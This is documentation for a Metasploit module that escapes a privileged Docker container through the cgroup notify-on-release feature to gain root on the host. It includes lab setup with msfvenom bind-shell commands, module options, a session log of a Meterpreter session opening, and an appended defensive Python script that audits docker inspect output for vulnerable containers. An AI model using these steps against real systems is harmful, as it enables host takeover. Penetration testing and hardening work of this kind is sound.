## Vulnerable Application

Docker privileged container escape that obtains root on the host machine by abusing the Linux cgroup notify-on-release feature. Both Meterpreter and classic shell sessions are supported. The exploit copies a payload to a writable directory in the container, escapes the container, and then either searches for the payload on the host file system or copies it directly out of the container, and finally executes it on the host.

### Creating A Testing Environment

- Install Docker
- Create a privileged container (forwarding port 4444 in this example in order to use a bind shell from the host)

```bash
docker run -d -it --name test-vuln-container -p 4444:4444 --privileged ubuntu
```

- Obtain a shell on the container with Metasploit. One possible option is:

```bash
# Create a bind shell using msfvenom
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=4444 -f elf -o ./bind4444.bin
# Copy bind shell into container
docker cp ./bind4444.bin test-vuln-container:/bind4444.bin
# Execute bind shell in the container
docker exec -it test-vuln-container /bind4444.bin
```

- Connect to this bind shell in Metasploit

```bash
use multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 127.0.0.1
set lport 4444
run
```

## Verification Steps

1. `use exploit/linux/local/docker_privileged_container_escape`
2. `set SESSION [session]`
3. `set PAYLOAD [payload]`
4. `set LHOST [lhost]`
5. `set LPORT [lport]`
6. `exploit`

## Options

### PAYLOAD

Set this option to choose which type of root session you want to create.

### ForceExploit

Force the exploit even if the current session does not appear to be in a Docker container, or the container does not appear vulnerable.

### ForcePayloadSearch

Force the exploit to search for the payload in the host file system rather than copying it out of the Docker container. This avoids the need for a writable directory on the host system. Typically, the filesystem of the container will be located under the `/var/lib/docker/overlay2/` directory.
### WritableContainerDir

A directory where we can write files inside the container (default is `/tmp`). This is needed to drop the payload into the container.

### WritableHostDir

A directory where we can write files on the host (default is `/tmp`). This is needed to copy the payload from the container onto the host. Alternatively, see ForcePayloadSearch.

## Scenarios

### Container Escape starting with a Meterpreter shell

```
msf5 exploit(multi/handler) > use exploit/linux/local/docker_privileged_container_escape
msf5 exploit(linux/local/lxc_privilege_escalation) > set session 1
session => 1
msf5 exploit(linux/local/lxc_privilege_escalation) > run
[*] Started reverse TCP handler on 10.0.2.15:4444
[*] Writing payload executable to '/tmp/aLQdBKpMXLo'
[*] Executing script to exploit privileged container
[*] Sending stage (3012516 bytes) to 192.168.0.231
[*] Meterpreter session 4 opened (0.0.0.0:0 -> 192.168.0.231:4444) at 2020-07-19 14:50:51 +0100
```
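Added as a defender-side audit, not part of the module or this documentation: the script below reads `docker inspect` JSON (a constructed sample is embedded so it runs offline) and flags containers that satisfy the precondition this escape depends on, namely `--privileged`, or `CAP_SYS_ADMIN` added together with a writable host cgroupfs bind mount. The `HostConfig` field names are the ones `docker inspect` emits; the container names and values in the sample are constructed.

```python
"""Flag Docker containers whose HostConfig grants the preconditions of the
privileged-container cgroup escape: --privileged (all capabilities, host
devices and a writable cgroupfs), or CAP_SYS_ADMIN plus a writable cgroupfs
bind mount. Input is the JSON array printed by `docker inspect <names...>`."""
import json

# Constructed sample of `docker inspect` output, trimmed to the fields read here.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/test-vuln-container",
     "HostConfig": {"Privileged": True, "CapAdd": None, "Binds": None}},
    {"Name": "/hardened",
     "HostConfig": {"Privileged": False, "CapAdd": None,
                    "Binds": ["/data:/data:ro"]}},
    {"Name": "/capadd-cgroup",
     "HostConfig": {"Privileged": False, "CapAdd": ["SYS_ADMIN"],
                    "Binds": ["/sys/fs/cgroup:/sys/fs/cgroup:rw"]}},
])


def audit_containers(inspect_json):
    """Return {container_name: [reasons]} for every container worth reviewing."""
    findings = {}
    for container in json.loads(inspect_json):
        name = container.get("Name", "?").lstrip("/")
        host_cfg = container.get("HostConfig") or {}
        reasons = []
        if host_cfg.get("Privileged"):
            reasons.append("--privileged: all caps, host devices, writable cgroupfs")
        # CapAdd entries may be spelled SYS_ADMIN or CAP_SYS_ADMIN; normalise.
        caps = set()
        for cap in host_cfg.get("CapAdd") or []:
            cap = cap.upper()
            caps.add(cap[4:] if cap.startswith("CAP_") else cap)
        if "SYS_ADMIN" in caps:
            reasons.append("CAP_SYS_ADMIN added (needed to mount/write cgroupfs)")
        # Binds look like host:container[:mode]; no mode means read-write.
        for bind in host_cfg.get("Binds") or []:
            src, _, rest = bind.partition(":")
            if src.startswith("/sys/fs/cgroup") and not rest.endswith(":ro"):
                reasons.append("host cgroupfs bind-mounted writable: " + bind)
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in audit_containers(SAMPLE_INSPECT).items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```

In practice feed it `docker inspect $(docker ps -q)`; a container flagged here is exactly one where the module's vulnerability check (the one ForceExploit overrides) would pass.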